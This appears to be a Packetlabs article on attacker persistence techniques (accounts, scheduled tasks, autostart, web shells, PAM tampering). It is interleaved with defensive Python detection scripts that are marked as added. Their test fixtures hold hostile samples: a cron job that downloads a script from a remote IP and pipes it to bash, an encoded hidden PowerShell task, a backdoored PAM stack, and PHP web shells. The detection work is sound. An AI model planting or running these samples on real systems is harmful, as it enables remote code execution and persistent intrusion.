Cyberattacks are complex, strategic endeavors that often follow a structured sequence known as the cyberattack lifecycle. Each stage is critical to the attacker's ultimate goal, whether that is ransoming, destroying, or stealing data, or causing other negative impacts such as reputational damage. Understanding each stage of the lifecycle helps defenders prepare appropriate and adequate measures to mitigate threats effectively. Lockheed Martin's Cyber Kill Chain model makes the point explicitly: disrupting any one stage of an attack can deny the attacker a successful outcome.
In this article we review an important tactic, maintaining persistence, which falls within the Installation stage of the Cyber Kill Chain model. Persistence allows threat actors to extend their dwell time and keep a more reliable command and control (C2) channel, increasing their overall chances of success.
Persistence is a crucial stage, usually embedded within the Installation phase of a cyber attack. It consists of techniques that allow the attacker to keep a foothold on the system across reboots, updates, and credential changes, or to reinstall the malware after defenders attempt to remove it.
Malware's ability to persist on a compromised system ensures that the attacker can continue to execute their objectives over an extended period, and increases their chances of success for stealing additional data, spreading across the network, or waiting for a more opportune moment to strike.
Persistence techniques vary widely but commonly include manipulating system processes to restart malicious programs automatically, altering registry keys, or creating scheduled tasks to ensure the malware is initialized at regular intervals. More sophisticated methods might involve writing malware directly into firmware or leveraging rootkit capabilities to embed malicious code within the OS kernel.
All of the items listed below are part of the MITRE ATT&CK Enterprise matrix, a catalogued framework of known cyber attack tactics and techniques. Defenders are encouraged to map these known attack methods to the MITRE D3FEND matrix for guidance on countermeasures for each technique. It is important to note, however, that while MITRE ATT&CK and D3FEND are highly effective tools for understanding the cyber attack landscape, neither is a holistic or 100% comprehensive list of attacker behaviors, since attackers are always inventing new ways to compromise systems. MITRE accepts community contributions of new techniques and procedures, which is how the matrices stay as comprehensive as possible.
Here are the most commonly used persistence techniques seen in cyber attacks:
Using Accounts For Persistent Access: Attackers may manipulate the configuration of existing accounts [T1098], create new accounts for themselves [T1136], or use stolen credentials for valid existing accounts [T1078] in order to maintain long-term access to a compromised system. Regular auditing of user account lists, their access logs, and configuration settings can help detect and mitigate this method of persistent access. Other IT security best practices can also prevent attackers from logging into accounts they control, including allowlisting the IP addresses that may be granted access, using Zero Trust solutions, and monitoring network traffic for anomalous activity.
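The auditing described above can be turned into a small correlation rule set. The following is an added example, not tooling from Packetlabs or from the article: it walks a batch of Windows Security events and flags the three account-based techniques (4720 account creation for T1136, 4732/4738 account and group changes for T1098, and 4624 logons from outside an IP allowlist for T1078). The event records are constructed samples with simplified field names, and the allowlisted networks and privileged-group list are assumed policy values.

```python
"""Audit Windows Security events for account-based persistence.

Added example (not Packetlabs' tooling). The records below are constructed
samples carrying a subset of the fields from Security log events 4720
(account created), 4732 (member added to a local group), 4738 (account
changed) and 4624 (successful logon). The source-IP allowlist and the
privileged-group list are assumed policy values.
"""
from datetime import datetime
from ipaddress import ip_address, ip_network

# Assumed policy: network (type 3) and RDP (type 10) logons may only come from these ranges.
ALLOWED_SOURCES = [ip_network("10.0.0.0/8"), ip_network("192.168.1.0/24")]
PRIVILEGED_GROUPS = {"Administrators", "Remote Desktop Users", "Backup Operators"}

# Constructed sample events (field names simplified from the real event XML).
SAMPLE_EVENTS = [
    {"id": 4720, "time": "2024-05-01T02:14:05", "subject": "CORP\\jdoe", "target": "svc_backup2"},
    {"id": 4732, "time": "2024-05-01T02:14:09", "subject": "CORP\\jdoe", "target": "svc_backup2", "group": "Administrators"},
    {"id": 4738, "time": "2024-05-01T02:15:00", "subject": "CORP\\jdoe", "target": "helpdesk", "changed": "PasswordNeverExpires"},
    {"id": 4624, "time": "2024-05-01T02:20:11", "target": "svc_backup2", "logon_type": 10, "src_ip": "203.0.113.42"},
    {"id": 4624, "time": "2024-05-01T09:00:00", "target": "jdoe", "logon_type": 10, "src_ip": "10.1.4.7"},
]


def is_allowed_source(src_ip: str) -> bool:
    """True when the logon source falls inside an allowlisted network."""
    ip = ip_address(src_ip)
    return any(ip in net for net in ALLOWED_SOURCES)


def audit_account_events(events, window_seconds: int = 600) -> list:
    """Return (rule, account, detail) findings, in event-time order."""
    created = {}  # account -> time of its 4720 event, to correlate later privilege grants
    findings = []
    for e in sorted(events, key=lambda ev: ev["time"]):
        when = datetime.fromisoformat(e["time"])
        if e["id"] == 4720:
            created[e["target"]] = when
            findings.append(("T1136 account created", e["target"], f"by {e['subject']}"))
        elif e["id"] == 4732 and e.get("group") in PRIVILEGED_GROUPS:
            detail = f"added to {e['group']} by {e['subject']}"
            if e["target"] in created:
                delta = int((when - created[e["target"]]).total_seconds())
                if delta <= window_seconds:
                    detail += f", {delta}s after creation"
            findings.append(("T1098 privileged group change", e["target"], detail))
        elif e["id"] == 4738 and e.get("changed") == "PasswordNeverExpires":
            findings.append(("T1098 account attribute change", e["target"],
                             f"PasswordNeverExpires set by {e['subject']}"))
        elif e["id"] == 4624 and e.get("logon_type") in (3, 10) and not is_allowed_source(e["src_ip"]):
            findings.append(("T1078 logon from non-allowlisted source", e["target"],
                             f"{e['src_ip']} (logon type {e['logon_type']})"))
    return findings


if __name__ == "__main__":
    for rule, account, detail in audit_account_events(SAMPLE_EVENTS):
        print(f"{rule:40} {account:12} {detail}")
```

In production the events would come from Get-WinEvent or a SIEM rather than a literal list, and the group-change rule should also cover 4728 (global group) and 4756 (universal group) for domain accounts. The creation-to-privilege window is the useful signal: legitimate provisioning rarely creates an account and adds it to Administrators within seconds from the same interactive session.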
Scheduled Task / Job [T1053]: Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time (for example, the Windows Task Scheduler, cron, and launchd). A task can also be scheduled on a remote system, provided the proper authentication is met (e.g., RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires membership in an administrative or otherwise privileged group on that system.
Boot or Logon Autostart Execution [T1547], Boot or Logon Initialization Scripts [T1037], or Create or Modify System Process [T1543]: Attackers often leverage the OS's ability to launch software during the boot or logon process to ensure their malicious code runs every time the system starts or a user logs in. This could involve modifying Windows Registry Run keys or Startup folder contents, or inserting scripts in places executed during system boot or user logon, such as .bash_profile, .bashrc, or systemd service units on Linux. Defense strategies include inventorying and monitoring startup configurations, using security software to detect unauthorized changes, and educating users about secure practices for managing logon scripts.
Compromise Host Software Binary [T1554]: Attackers can manipulate legitimate software on a host to execute malicious code. Attackers may replace legitimate software binaries with trojanized versions or modify the execution path of existing applications. Ensuring software integrity, using application allowlisting to prevent unauthorized applications from executing, employing user and entity behavior analytics (UEBA) to detect anomalies in application behavior, and regular system and software integrity checks can help mitigate these risks.
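Scheduled tasks, Run keys and cron jobs are all just "a command line plus a trigger", so the two entries above can be triaged with one set of heuristics. The following is an added example, not code from the article or from Packetlabs: it parses a Windows Task Scheduler task definition (the XML that `schtasks /query /xml` exports), a set of Registry Run values, and a crontab, and scores each command for the signs a practitioner looks for first (user-writable paths, living-off-the-land binaries, encoded payloads, download cradles, hidden tasks). The task XML, Run values and crontab text are constructed samples; the path and binary lists are assumptions to tune against your own baseline.

```python
"""Triage autostart entries for persistence indicators.

Added example, not tooling from the original article. It scores the command
behind a Windows scheduled task (T1053.005), a Run key value (T1547.001) and
a crontab line (T1053.003) with one shared set of heuristics. The task XML,
registry values and crontab text below are constructed samples; the path and
binary lists are assumptions to tune against your own baseline.
"""
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Heuristics (assumed): paths any user can write to, commonly abused binaries,
# encoded payloads and download cradles.
USER_WRITABLE = re.compile(r"(\\AppData\\|\\Temp\\|\\ProgramData\\|\\Users\\Public\\|/tmp/|/dev/shm/|/home/)", re.I)
LOLBINS = re.compile(r"\b(powershell|pwsh|mshta|regsvr32|rundll32|wscript|cscript|certutil|bitsadmin|curl|wget|bash -c|python3?)\b", re.I)
ENCODED = re.compile(r"(-enc(odedcommand)?\s+[A-Za-z0-9+/=]{20,}|base64\s+-d|FromBase64String)", re.I)
URL = re.compile(r"https?://", re.I)


def score_command(command: str) -> list:
    """Return the list of reasons a command line looks like persistence."""
    reasons = []
    if USER_WRITABLE.search(command):
        reasons.append("runs from user-writable path")
    if LOLBINS.search(command):
        reasons.append("living-off-the-land binary")
    if ENCODED.search(command):
        reasons.append("encoded payload")
    if URL.search(command):
        reasons.append("download cradle")
    return reasons


def triage_task_xml(xml_text: str) -> dict:
    """Extract command, triggers and the Hidden flag from Task Scheduler XML and score it."""
    root = ET.fromstring(xml_text)
    exec_node = root.find("t:Actions/t:Exec", TASK_NS)
    command = exec_node.findtext("t:Command", default="", namespaces=TASK_NS)
    args = exec_node.findtext("t:Arguments", default="", namespaces=TASK_NS)
    full = f"{command} {args}".strip()
    triggers_el = root.find("t:Triggers", TASK_NS)
    triggers = [c.tag.split("}")[1] for c in triggers_el] if triggers_el is not None else []
    hidden = root.findtext("t:Settings/t:Hidden", default="false", namespaces=TASK_NS) == "true"
    reasons = score_command(full)
    if hidden:
        reasons.append("Hidden=true (not shown in the Task Scheduler UI)")
    return {"command": full, "triggers": triggers, "hidden": hidden, "reasons": reasons}


def triage_run_keys(values: dict) -> dict:
    """Score each Run/RunOnce value (name -> command string)."""
    return {name: score_command(cmd) for name, cmd in values.items()}


def triage_crontab(text: str) -> list:
    """Return (command, reasons) for each job line in a crontab."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Z_]+=", line):
            continue  # blank, comment or environment assignment
        # "@reboot cmd" has one schedule token; "m h dom mon dow cmd" has five.
        parts = line.split(None, 1) if line.startswith("@") else line.split(None, 5)
        command = parts[-1]
        jobs.append((command, score_command(command)))
    return jobs


# Constructed samples.
SAMPLE_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author"><Exec>
    <Command>powershell.exe</Command>
    <Arguments>-NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA</Arguments>
  </Exec></Actions>
</Task>"""

SAMPLE_RUN_KEYS = {
    "SecurityHealth": r"C:\Windows\System32\SecurityHealthSystray.exe",
    "OneDrive": r"C:\Users\jdoe\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
    "Updater": r"wscript.exe C:\Users\Public\update.vbs",
}

SAMPLE_CRONTAB = """SHELL=/bin/bash
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
@reboot /bin/bash -c "curl -s http://198.51.100.9/a.sh | bash"
*/10 * * * * python3 /dev/shm/.x/agent.py
"""

if __name__ == "__main__":
    print(triage_task_xml(SAMPLE_TASK_XML))
    print(triage_run_keys(SAMPLE_RUN_KEYS))
    print(triage_crontab(SAMPLE_CRONTAB))
```

Note that the OneDrive Run value scores one hit because it legitimately runs from AppData, which is why this kind of scoring is a triage aid and not an alert on its own: compare the inventory against a known-good baseline from a clean build of the same image, and treat new entries, not merely suspicious-looking ones, as the primary signal.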
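The "software integrity checks" above amount to hashing every binary against a trusted baseline and reporting what changed. The following is an added example, not code from the article or from Packetlabs: it builds a SHA-256 baseline of a directory tree, then verifies a later state and reports modified, added and removed files. The sample tree (a trojanized sshd, a dropped shared library, a deleted file) is constructed in a temporary directory.

```python
"""Baseline-and-verify file integrity check for host software (T1554).

Added example, not from the original article. It hashes every regular file
under a directory, keeps the result as a baseline, and reports files that were
modified, added or removed. The sample tree is constructed in a temp directory.
"""
import hashlib
import json
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Stream a file through SHA-256 so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict:
    """Map relative path -> {sha256, size} for every regular file under root."""
    baseline = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and not p.is_symlink():
            baseline[p.relative_to(root).as_posix()] = {"sha256": sha256_file(p), "size": p.stat().st_size}
    return baseline


def verify(root: Path, baseline: dict) -> dict:
    """Compare the current tree against a stored baseline."""
    current = build_baseline(root)
    return {
        "modified": sorted(k for k in baseline if k in current and current[k]["sha256"] != baseline[k]["sha256"]),
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
    }


def demo() -> dict:
    """Constructed scenario: trojanize one binary, drop a new library, delete one file."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "lib").mkdir()
        (root / "bin" / "sshd").write_bytes(b"\x7fELF legitimate sshd")
        (root / "bin" / "ls").write_bytes(b"\x7fELF legitimate ls")
        (root / "lib" / "libc.so.6").write_bytes(b"\x7fELF libc")
        baseline = build_baseline(root)
        # Round-trip through JSON, as a real deployment stores the baseline off-host.
        baseline = json.loads(json.dumps(baseline))

        # Simulated compromise: same filename, different code; new file; deleted file.
        (root / "bin" / "sshd").write_bytes(b"\x7fELF sshd with credential logger")
        (root / "lib" / "libevil.so").write_bytes(b"\x7fELF preload hook")
        (root / "lib" / "libc.so.6").unlink()
        return verify(root, baseline)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Two caveats matter in practice. The baseline must be stored and compared from outside the host (or signed), because an attacker with root can simply regenerate it after replacing the binary; and the hash set should be seeded from package metadata where it exists (`rpm -V` and `dpkg --verify` check the vendor's hashes directly), so that a trojanized file is caught even when the first baseline was taken after compromise.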
Event Triggered Execution [T1546] or Hijack Execution Flow [T1574]: Adversaries may establish persistence using system mechanisms that trigger execution in response to specific events. Various operating systems provide ways to monitor and subscribe to events such as logons or other user activity, including the launch of specific applications or binaries (for example, WMI event subscriptions on Windows). Hijacking execution flow instead abuses how the OS locates code to run, such as DLL search order or PATH resolution, so that a malicious file is loaded in place of the expected one. Cloud environments may also support functions and services that can be invoked in response to specific cloud events.
Implant Internal Image [T1525]: Adversaries may implant malicious code into the virtual machine or container images an organization builds its instances from, so that every instance launched from the backdoored image starts already compromised. Because the implant lives in the trusted image rather than on any one host, it survives instance rebuilds much as a rootkit survives reboots, and detection is particularly challenging since the image is trusted by definition. Mitigation efforts include signing and verifying images, scanning images both in the registry and at launch, restricting who can push to image repositories, and utilizing EDR solutions capable of identifying rogue virtual machines.
By avoiding easy detection, attackers can maintain control over the system without alerting the user or administrators. The effectiveness of a particular persistence strategy depends significantly on the attacker's ability to conceal their presence.
Some commonly used techniques for hiding persistence mechanisms include using Living Off The Land (LOTL) techniques, disguising malicious processes as legitimate software, encrypting payloads, or using a rootkit to infect the system at the OS kernel level. Importantly, when an attacker has higher privileges on a system, they have more covert options for persistence at their disposal.
Here are some other notable techniques used by attackers for persistence:
Browser Extensions [T1176]: Attackers might install malicious browser extensions to maintain persistent access to targeted systems. Extensions, or plugins, are popular for enhancing productivity and user experience by providing extended or personalized functionality, but rogue extensions give an attacker persistent covert access and can be used to launch more advanced social engineering attacks, execute data theft, or attempt browser escape attacks.
Modify Authentication Process [T1556]: Attackers might tamper with authentication systems and processes to harvest user credentials or gain unauthorized entry into accounts. Authentication in various systems is managed through specific mechanisms, including the Local Security Authority Subsystem Service (LSASS) and the Security Accounts Manager (SAM) in Windows, pluggable authentication modules (PAM) on Unix-like systems, and authorization plugins on macOS. These mechanisms are crucial for collecting, storing, and verifying user credentials. By altering these authentication processes, an attacker could potentially gain access to services or systems without needing legitimate account credentials.
Modify Power Settings [T1653]: Adversaries may manipulate system power settings to prevent devices from sleeping, hibernating, or shutting down. This tactic is used to ensure that malware continues to run and maintain its functionality without interruption, which can be crucial for continuous data exfiltration, surveillance, or maintaining a persistent presence on the host system.
Bootkit [T1542.003] or System Firmware [T1542.001]: Bootkits and system firmware modifications involve altering firmware or boot components so that malicious code executes at a very early stage of the boot process, before the operating system and its security controls load. This type of persistence is extremely stealthy, resistant to traditional antivirus solutions, and survives OS reinstallation and disk reformatting. Protection requires securing the boot process with measures such as UEFI Secure Boot, verifying firmware integrity (for example, measured boot with TPM-backed attestation), keeping firmware updated and password-protected, and regularly scanning for unauthorized firmware changes.
Web Shell [T1505.003]: To maintain persistence on compromised web servers, attackers often install web shells, malicious scripts that enable remote administration through the web server itself. This gives attackers continuous access to the compromised server over ordinary HTTP(S) traffic. Effective defenses include using web application firewalls (WAFs), conducting regular security scans of web applications to detect and remove unauthorized scripts, and enforcing strict file permissions and other web server security best practices.
BITS Jobs [T1197]: Adversaries may leverage the Background Intelligent Transfer Service (BITS) in Windows to create or manipulate BITS jobs that download, execute, and even clean up after malicious code. BITS jobs are commonly used by legitimate applications to handle asynchronous file transfers over HTTP, making their abuse particularly stealthy. Defenses against such techniques include monitoring BITS job creation and execution with appropriate security tools, auditing and restricting who can create BITS jobs, and implementing EDR solutions to flag unusual activity associated with BITS.
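On Linux the most direct form of this technique is editing the PAM stack, so a defender's check is to parse the pam.d files and look for the handful of changes that weaken authentication. The following is an added example, not code from the article or from Packetlabs: it parses pam.d-style lines and flags `pam_permit.so` placed as `sufficient` in an auth stack (any password accepted), `nullok` on `pam_unix.so` (empty passwords accepted), modules loaded by absolute path from outside the system module directories, and module names not in an expected set. The pam.d text is a constructed sample, and the module directory and known-module lists are assumptions for the distribution being checked.

```python
"""Check a PAM stack for signs of a modified authentication process (T1556.003).

Added example, not from the original article. It parses pam.d-style lines and
flags: pam_permit.so short-circuiting an auth/account stack, nullok on
pam_unix.so, modules loaded from outside the system module directories, and
module names outside an expected set. The pam.d text is constructed; the
directory and module lists are assumptions for the distribution in use.
"""
import re

# Assumed: where this distribution keeps its PAM modules.
MODULE_DIRS = ("/lib/security/", "/lib64/security/", "/usr/lib64/security/",
               "/lib/x86_64-linux-gnu/security/", "/usr/lib/x86_64-linux-gnu/security/")
# Assumed: modules expected on this host; anything else is worth a look.
KNOWN_MODULES = {"pam_unix.so", "pam_deny.so", "pam_permit.so", "pam_env.so", "pam_faillock.so",
                 "pam_succeed_if.so", "pam_nologin.so", "pam_limits.so", "pam_systemd.so",
                 "pam_sss.so", "pam_keyinit.so", "pam_loginuid.so", "pam_selinux.so",
                 "pam_motd.so", "pam_lastlog.so", "pam_sepermit.so"}

# type  control  module [args]; control may be a bracketed [key=value ...] form.
LINE = re.compile(r"^(?P<type>-?(?:auth|account|password|session))\s+"
                  r"(?P<control>\[[^\]]+\]|\S+)\s+(?P<module>\S+)(?P<args>.*)$")


def parse_pam(text: str) -> list:
    """Return one dict per rule line, with the 1-based line number."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("@include"):
            continue
        m = LINE.match(line)
        if m:
            entries.append({"line": lineno, **m.groupdict(), "args": m.group("args").strip()})
    return entries


def audit_pam(text: str, module_dirs=MODULE_DIRS) -> list:
    """Return (line number, finding) pairs for the suspicious rules in a pam.d file."""
    findings = []
    for e in parse_pam(text):
        if e["control"] in ("include", "substack"):
            continue  # the "module" field is another pam.d file, audited separately
        mod, stack = e["module"], e["type"].lstrip("-")
        name = mod.rsplit("/", 1)[-1]
        if "/" in mod and not mod.startswith(module_dirs):
            findings.append((e["line"], f"module loaded from non-standard path: {mod}"))
        if name not in KNOWN_MODULES:
            findings.append((e["line"], f"unrecognised module: {name}"))
        if name == "pam_permit.so" and stack in ("auth", "account"):
            if e["control"] == "sufficient":
                findings.append((e["line"], f"pam_permit.so sufficient in {stack} stack: any credential accepted"))
            else:
                findings.append((e["line"], f"pam_permit.so in {stack} stack: review"))
        if name == "pam_unix.so" and stack == "auth" and "nullok" in e["args"].split():
            findings.append((e["line"], "pam_unix.so nullok: empty passwords accepted"))
    return findings


# Constructed sample with one backdoor of each kind.
SAMPLE_PAM = """#%PAM-1.0
auth       required     pam_env.so
auth       sufficient   pam_permit.so
auth       sufficient   pam_unix.so nullok try_first_pass
auth       required     pam_deny.so
account    required     pam_unix.so
session    optional     pam_keyinit.so revoke
session    required     /tmp/.cache/pam_unix.so
session    optional     pam_backdoor.so
session    [success=1 default=ignore] pam_loginuid.so
"""

if __name__ == "__main__":
    for lineno, finding in audit_pam(SAMPLE_PAM):
        print(f"line {lineno}: {finding}")
```

Run this over every file in /etc/pam.d plus the files they `include`, and pair it with a hash check of the module files themselves in the directories above: a patched `pam_unix.so` that logs passwords looks completely normal in the configuration.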
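The "regular security scans ... to detect and remove unauthorized scripts" above can start with a content scanner. The following is an added example, not code from the article or from Packetlabs: it walks a web root and scores PHP files against the patterns that distinguish web shells from ordinary application code (request parameters flowing into command or code execution, decoded-then-evaluated payloads, dynamic function names taken from input, and the password gate most shells carry). The PHP files are constructed samples written to a temporary directory; the file extensions and patterns are assumptions to extend for other languages.

```python
"""Score PHP files for web shell indicators (T1505.003).

Added example, not from the original article. It scans a directory of PHP
files for patterns typical of web shells: user input flowing into command or
code execution, obfuscation layers, and the usual password gate. Sample files
are constructed in a temp directory.
"""
import re
import tempfile
from pathlib import Path

INDICATORS = [
    ("request input reaches exec",
     re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE|SERVER)", re.I)),
    ("request input reaches eval",
     re.compile(r"\b(eval|assert)\s*\(.*\$_(GET|POST|REQUEST|COOKIE)", re.I)),
    ("decoded payload executed",
     re.compile(r"\b(eval|assert)\s*\(\s*(gzinflate|gzuncompress|gzdecode|base64_decode|str_rot13)\s*\(", re.I)),
    ("preg_replace /e evaluation",
     re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e[a-z]*['\"]", re.I)),
    ("dynamic function from input",
     re.compile(r"\$_(GET|POST|REQUEST)\s*\[[^\]]+\]\s*\(", re.I)),
    ("long base64 blob", re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")),
    ("password gate", re.compile(r"md5\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)", re.I)),
]


def scan_source(src: str) -> list:
    """Return the names of every indicator that matches the source text."""
    return [name for name, rx in INDICATORS if rx.search(src)]


def scan_tree(root: Path, exts=(".php", ".phtml", ".php5", ".phar")) -> dict:
    """Map relative path -> indicator hits for every PHP-like file with at least one hit."""
    results = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix.lower() in exts:
            hits = scan_source(p.read_text(errors="ignore"))
            if hits:
                results[p.relative_to(root).as_posix()] = hits
    return results


def demo() -> dict:
    """Constructed web root: one clean page and three shells of different styles."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "uploads").mkdir()
        (root / "includes").mkdir()
        # Legitimate code that reads request input without executing it.
        (root / "index.php").write_text("<?php echo htmlspecialchars($_GET['q']); ?>\n")
        # Classic command shell with a password gate, dropped via an image upload form.
        (root / "uploads" / "img.php").write_text(
            "<?php if(md5($_POST['pw'])=='5f4dcc3b5aa765d61d8327deb882cf99'){"
            " echo '<pre>'; system($_REQUEST['cmd']); echo '</pre>'; } ?>\n")
        # Obfuscated loader: payload is compressed and base64-encoded, then eval'd.
        (root / "uploads" / ".cache.php").write_text(
            "<?php eval(gzinflate(base64_decode('" + "QUFB" * 60 + "'))); ?>\n")
        # One-liner that lets the caller name the function and its argument.
        (root / "includes" / "db.php").write_text("<?php @$_POST['f']($_POST['a']); ?>\n")
        return scan_tree(root)


if __name__ == "__main__":
    for path, hits in demo().items():
        print(f"{path}: {', '.join(hits)}")
```

Content patterns catch the common shells but not a well-obfuscated or novel one, so pair this with the stronger signals: any PHP file whose hash is not in the deployed release, files in upload directories that the web server is allowed to execute at all, and access-log entries showing POST requests to paths that never receive them in normal use.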
This article delves into persistence techniques utilized in cyberattacks. By examining these methods defenders can better employ measures to detect them and disrupt this critical phase of a cyber attack. The MITRE ATT&CK and D3FEND frameworks can guide defenders in anticipating and mitigating persistence tactics.
© 2024 Packetlabs. All rights reserved.